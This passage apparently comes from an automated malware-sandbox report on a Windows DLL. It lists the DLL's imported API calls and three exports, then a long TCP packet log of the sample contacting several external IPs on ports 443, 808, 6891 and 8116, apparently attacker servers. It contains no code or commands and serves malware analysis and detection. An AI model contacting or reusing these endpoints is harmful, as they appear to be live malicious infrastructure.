GetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

Exports

Name	Ordinal	Address
Bluewing	1	0x49eed0
Earth	2	0x49efd0
Masterjust	3	0x49eb20

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2021 05:26:12.513001919 CEST	49745	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:12.513055086 CEST	443	49745	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:12.513165951 CEST	49745	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:12.536490917 CEST	49745	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:12.536518097 CEST	443	49745	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:13.030946016 CEST	443	49745	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:13.031045914 CEST	49745	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:13.462340117 CEST	49745	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:13.462368965 CEST	443	49745	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:13.462668896 CEST	443	49745	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:13.464337111 CEST	49745	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:13.467336893 CEST	49745	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:13.467443943 CEST	49745	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:13.467485905 CEST	443	49745	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:14.156580925 CEST	443	49745	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:14.156681061 CEST	443	49745	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:14.156692028 CEST	49745	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:14.156754971 CEST	49745	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:14.164752007 CEST	49745	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:14.164796114 CEST	443	49745	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:14.216464043 CEST	49746	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:14.216511011 CEST	443	49746	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:14.216612101 CEST	49746	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:14.235325098 CEST	49746	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:14.235347986 CEST	443	49746	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:14.324465990 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:14.482357979 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:14.482553959 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:14.483263016 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:14.641184092 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:14.642781019 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:14.642885923 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:14.770728111 CEST	443	49746	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:14.770889997 CEST	49746	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:15.110646963 CEST	49746	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:15.110671043 CEST	443	49746	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:15.110939026 CEST	443	49746	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:15.111008883 CEST	49746	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:15.135333061 CEST	49746	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:15.135489941 CEST	49746	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:15.135510921 CEST	443	49746	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:15.692468882 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:15.849224091 CEST	443	49746	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:15.849293947 CEST	49746	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:15.849311113 CEST	443	49746	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:15.849325895 CEST	443	49746	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:15.849359035 CEST	49746	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:15.849384069 CEST	49746	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:15.850440025 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:15.851025105 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:15.851097107 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:15.852664948 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:15.852803946 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:15.854499102 CEST	49746	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:15.854520082 CEST	443	49746	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:16.010358095 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.010507107 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.010586023 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.010627031 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.025676012 CEST	49751	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:16.189969063 CEST	808	49751	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.190090895 CEST	49751	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:16.190860033 CEST	49751	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:16.355319023 CEST	808	49751	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.358277082 CEST	808	49751	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.358867884 CEST	49751	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:16.399069071 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.399094105 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.399149895 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:16.399308920 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:16.406177044 CEST	49747	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:16.555605888 CEST	49751	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:16.563936949 CEST	808	49747	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.706161976 CEST	49752	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:16.719927073 CEST	808	49751	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.720698118 CEST	808	49751	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.720839977 CEST	49751	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:16.721642971 CEST	49751	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:16.721791983 CEST	49751	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:16.872324944 CEST	6891	49752	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:16.872443914 CEST	49752	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:16.873140097 CEST	49752	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:16.885878086 CEST	808	49751	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.886009932 CEST	808	49751	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.886023998 CEST	808	49751	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:16.886035919 CEST	808	49751	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:17.039098978 CEST	6891	49752	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:17.040225983 CEST	6891	49752	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:17.040877104 CEST	49752	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:17.269515991 CEST	808	49751	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:17.269536018 CEST	808	49751	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:17.269658089 CEST	49751	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:17.272212029 CEST	49751	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:17.392859936 CEST	49753	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:17.426462889 CEST	49752	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:17.436599016 CEST	808	49751	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:17.558830023 CEST	6891	49753	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:17.558964014 CEST	49753	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:17.559787035 CEST	49753	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:17.592861891 CEST	6891	49752	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:17.592976093 CEST	49752	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:17.593734980 CEST	49752	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:17.593924046 CEST	49752	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:17.725893021 CEST	6891	49753	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:17.726780891 CEST	6891	49753	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:17.726878881 CEST	49753	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:17.744381905 CEST	49753	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:17.759963989 CEST	6891	49752	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:17.759978056 CEST	6891	49752	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:17.910535097 CEST	6891	49753	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:17.910621881 CEST	49753	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:17.911372900 CEST	49753	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:17.911493063 CEST	49753	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:18.077373028 CEST	6891	49753	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:18.115232944 CEST	6891	49753	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:18.143831015 CEST	6891	49752	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:18.143855095 CEST	6891	49752	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:18.143970013 CEST	49752	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:18.152046919 CEST	49752	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:18.318226099 CEST	6891	49752	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:18.418719053 CEST	49754	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.455354929 CEST	6891	49753	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:18.455379009 CEST	6891	49753	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:18.455508947 CEST	49753	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:18.455563068 CEST	49753	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:18.459207058 CEST	49753	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:18.473830938 CEST	8116	49754	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.474395037 CEST	49754	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.475888014 CEST	49754	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.530771017 CEST	8116	49754	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.540214062 CEST	8116	49754	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.540234089 CEST	8116	49754	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.540357113 CEST	49754	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.547034979 CEST	49754	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.577666044 CEST	49755	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.602694035 CEST	8116	49754	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.602854013 CEST	49754	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.603578091 CEST	49754	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.603722095 CEST	49754	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.625276089 CEST	6891	49753	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:18.637887955 CEST	8116	49755	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.638056993 CEST	49755	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.638667107 CEST	49755	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.658579111 CEST	8116	49754	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.697923899 CEST	8116	49755	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.709278107 CEST	8116	49755	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.709321022 CEST	8116	49755	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.709376097 CEST	49755	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.709408998 CEST	49755	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.716120005 CEST	49755	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.777252913 CEST	8116	49755	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.777401924 CEST	49755	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.778112888 CEST	49755	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.778346062 CEST	49755	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.839839935 CEST	8116	49755	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.868980885 CEST	8116	49754	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.869004965 CEST	8116	49754	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.869129896 CEST	49754	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.869174004 CEST	49754	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.877131939 CEST	49754	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:18.932727098 CEST	8116	49754	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:18.998888016 CEST	49756	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:18.998927116 CEST	443	49756	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:18.998991966 CEST	49756	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:18.999742031 CEST	49756	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:18.999758005 CEST	443	49756	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:19.024315119 CEST	8116	49755	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:19.024336100 CEST	8116	49755	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:19.024426937 CEST	49755	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:19.027203083 CEST	49755	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:19.086555958 CEST	8116	49755	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:19.310950994 CEST	49757	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:19.311007977 CEST	443	49757	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:19.311141014 CEST	49757	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:19.311614990 CEST	49757	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:19.311635017 CEST	443	49757	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:19.489741087 CEST	443	49756	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:19.489844084 CEST	49756	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:19.490607023 CEST	49756	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:19.490613937 CEST	443	49756	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:19.508383989 CEST	49756	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:19.508403063 CEST	443	49756	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:19.508514881 CEST	49756	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:19.508524895 CEST	443	49756	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:19.830822945 CEST	443	49757	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:19.831656933 CEST	49757	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:19.831665993 CEST	49757	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:19.831674099 CEST	443	49757	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:19.840204954 CEST	49757	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:19.840223074 CEST	443	49757	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:19.840241909 CEST	49757	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:19.840253115 CEST	443	49757	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:20.199134111 CEST	443	49756	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:20.199202061 CEST	443	49756	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:20.199225903 CEST	49756	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:20.199256897 CEST	49756	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:20.206337929 CEST	49756	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:20.206367016 CEST	443	49756	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:20.401830912 CEST	49758	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:20.546036005 CEST	443	49757	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:20.546113968 CEST	443	49757	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:20.546160936 CEST	49757	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:20.546246052 CEST	49757	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:20.548892021 CEST	49757	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:20.548918962 CEST	443	49757	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:20.567698956 CEST	808	49758	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:20.567790985 CEST	49758	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:20.568537951 CEST	49758	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:20.716780901 CEST	49759	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:20.733109951 CEST	808	49758	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:20.733259916 CEST	808	49758	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:20.733355999 CEST	49758	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:20.733860970 CEST	49758	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:20.739418030 CEST	49758	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:20.739559889 CEST	49758	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:20.878320932 CEST	808	49759	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:20.879165888 CEST	49759	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:20.879909992 CEST	49759	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:20.898392916 CEST	808	49758	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:20.904220104 CEST	808	49758	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:20.904267073 CEST	808	49758	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:20.904294014 CEST	808	49758	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.041260004 CEST	808	49759	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.041563988 CEST	808	49759	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.041698933 CEST	49759	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:21.042105913 CEST	49759	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:21.045667887 CEST	49759	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:21.045766115 CEST	49759	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:21.203438044 CEST	808	49759	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.207101107 CEST	808	49759	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.207124949 CEST	808	49759	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.207133055 CEST	808	49759	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.299057007 CEST	808	49758	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.299088001 CEST	808	49758	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.299143076 CEST	49758	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:21.299221039 CEST	49758	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:21.305964947 CEST	49758	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:21.416358948 CEST	49760	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:21.471297979 CEST	808	49758	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.585691929 CEST	6891	49760	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:21.585850954 CEST	49760	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:21.586767912 CEST	49760	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:21.593868971 CEST	808	49759	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.593894005 CEST	808	49759	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.594173908 CEST	49759	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:21.594223022 CEST	49759	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:21.596985102 CEST	49759	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:21.719286919 CEST	49761	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:21.752612114 CEST	6891	49760	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:21.753062010 CEST	6891	49760	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:21.753153086 CEST	49760	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:21.753849030 CEST	49760	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:21.758441925 CEST	808	49759	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:21.762171030 CEST	49760	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:21.762203932 CEST	49760	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:21.885380983 CEST	6891	49761	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:21.885490894 CEST	49761	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:21.886276007 CEST	49761	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:21.928193092 CEST	6891	49760	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:22.052202940 CEST	6891	49761	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:22.052294016 CEST	6891	49761	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:22.052455902 CEST	49761	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:22.053008080 CEST	49761	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:22.057112932 CEST	49761	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:22.057219028 CEST	49761	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:22.223148108 CEST	6891	49761	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:22.223176956 CEST	6891	49761	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:22.321907043 CEST	6891	49760	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:22.321953058 CEST	6891	49760	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:22.322058916 CEST	49760	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:22.322105885 CEST	49760	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:22.329597950 CEST	49760	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:22.452377081 CEST	49762	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.497075081 CEST	6891	49760	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:22.508883953 CEST	8116	49762	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.509010077 CEST	49762	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.509526014 CEST	49762	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.566840887 CEST	8116	49762	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.567291975 CEST	8116	49762	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.567405939 CEST	49762	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.567982912 CEST	49762	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.572432041 CEST	49762	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.572630882 CEST	49762	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.606892109 CEST	6891	49761	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:22.606918097 CEST	6891	49761	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:22.606955051 CEST	49761	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:22.606982946 CEST	49761	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:22.609316111 CEST	49761	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:22.628654957 CEST	8116	49762	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.628940105 CEST	8116	49762	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.629318953 CEST	8116	49762	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.731937885 CEST	49763	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.775202990 CEST	6891	49761	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:22.789263010 CEST	8116	49763	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.789405107 CEST	49763	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.790169001 CEST	49763	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.798645020 CEST	8116	49762	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.798661947 CEST	8116	49762	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.798743010 CEST	49762	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.798775911 CEST	49762	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.806413889 CEST	49762	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.847203016 CEST	8116	49763	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.847510099 CEST	8116	49763	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.847584963 CEST	49763	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.848285913 CEST	49763	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.853642941 CEST	49763	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:22.853774071 CEST	49763	8116	192.168.2.3	185.56.219.47
